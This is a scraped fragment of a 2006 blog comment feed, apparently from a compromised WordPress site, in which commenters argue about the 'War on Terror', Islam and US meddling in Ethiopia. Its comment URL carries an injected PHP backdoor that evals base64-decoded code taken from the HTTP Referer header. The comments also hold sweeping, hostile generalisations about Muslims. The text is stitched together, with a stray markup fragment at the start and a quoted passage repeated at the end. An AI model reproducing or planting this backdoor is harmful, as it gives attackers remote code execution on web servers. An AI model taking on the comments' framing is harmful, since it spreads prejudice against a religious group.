]]> By: Aurelius http://nwbloggers.com/2006/12/24/an-early-christmas-present-from-ethiopia/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/comment-page-1/#comment-4500 Aurelius Tue, 26 Dec 2006 22:51:47 +0000 http://nwbloggers.com/2006/12/24/an-early-christmas-present-from-ethiopia/#comment-4500 I am less and less thrilled with the phrase War On Terror, as it is far too nebulous and inexact, in any case.We are in a war with several brands of Fundamentalist Islam.  This is nothing new, it has been running hot and cold for over 1000 years.  Ignore it all you like, but fully 2 Billion people around the world are Muslim - it is one of, if not the, fastest growing religion on the planet.And since it lacks any type of centralized authority, any nutjob Mullah out there can declare Fatwahs and Jihads, and human nature being what it is, a bunch of other unstable individuals will follow them.The Ottomans curbed some of the worst of this over the last several hundred years, but with their passing after WWI, and the lack of a Superpower face-off since the end of the cold war, the fanatics are running rampant.The idea that if we just butt out of Muslim lands, they will leave us alone, is simply counter to history and human nature.  And with the spread of Islam at its current extent, the argument can be made that much of Europe will soon be Muslim lands.  Should we begin evacuating England now?We must fight the fanatics wherever we find them.  Iraq, Somalia, Canada, wherever.But be very careful when you call on the Saudi's for help - Saudi money is behind the Wahabbists - one of the more virulent strains of Islam... I am lessand less convinced there is any real stake in our direct involvement in the phony war on terror - in fact I think our meddling is counterproductive generally. It was our meddling that set OBL off in the first place...   That said, I'm still in favor of guns and butter for Ethiopia. A little more meddling there won't make us any enemies we don't already have. But what would be far better would be to twist some Arab arms and get them to do the meddling. This is another case where Saudi Arabia should be the front men. After all, it's their religion run amok... About time…

That said, I’m still in favor of guns and butter for Ethiopia. A little more meddling there won’t make us any enemies we don’t already have.
